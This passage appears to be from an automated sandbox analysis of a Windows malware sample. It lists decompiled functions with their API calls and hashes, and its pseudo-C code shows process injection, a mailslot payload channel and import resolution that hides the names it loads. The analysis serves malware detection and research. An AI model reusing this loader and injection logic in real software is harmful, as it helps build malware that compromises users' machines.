    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
